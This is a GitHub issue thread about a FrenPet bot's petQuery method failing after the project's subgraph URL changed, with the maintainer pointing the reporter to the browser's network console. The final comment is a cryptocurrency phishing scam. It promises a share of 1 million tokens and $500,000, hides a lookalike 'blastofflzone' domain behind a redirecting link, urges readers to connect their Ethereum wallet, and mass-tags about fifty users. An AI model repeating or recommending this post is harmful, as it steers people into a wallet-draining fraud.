### ISSUE TITLE
petQuery no pet

### ISSUE THREAD

**Issue by kenkenwnag** [Boyuan-Chen/FrenPet#1]
Hi thank you for providing this code

But yesterday the project side seemed to have changed the contract

As a result, the petQuery method currently cannot catch pets.

I don't know if you know why

**Comment by boyuan-chen** [comment]
Hey @kenkenwnag , please try again. They changed their subgraph node URL.

**Comment by kenkenwnag** [comment]
Thank you for your help
How did you know that he updated this website?

**Comment by boyuan-chen** [comment]
You can check the network in the console.

**Comment by kenkenwnag** [comment]
this website ?
https://frenpet.xyz/

**Comment by kenkenwnag** [comment]
It seems that the URL has been changed again

**Comment by ahmadShahin123** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Jayyiiiii, @wuwenjie1992, @imranpollob, @lshoo, @maxmetagravity, @hitripod, @jaaia, @taurenshaman, @0XCF-1022, @yueliang42, @Deer-memory, @925393447, @hekejian, @elian9, @azoth1991, @overarchingSky, @dotjin, @xuntongJIang, @f4x-safe, @liujun2014519, @avansu, @snoopy996, @ravenzerox, @dwcc, @zhelin, @FuradWho, @huyang741852, @ashinnotfound, @sooody, @lichao0111, @traceurl, @nvthaovn, @shiyuebin07, @ATrnd, @EthanOK, @a186r, @chongcclhk, @vanishcode, @cshezhang, @nonu11, @a3roger, @banshee2046, @xioayangguang, @badmonkey7, @xuyanshi, @samepattern, @pockyzhang, @vonjk, @bitkongyin, @pde2018
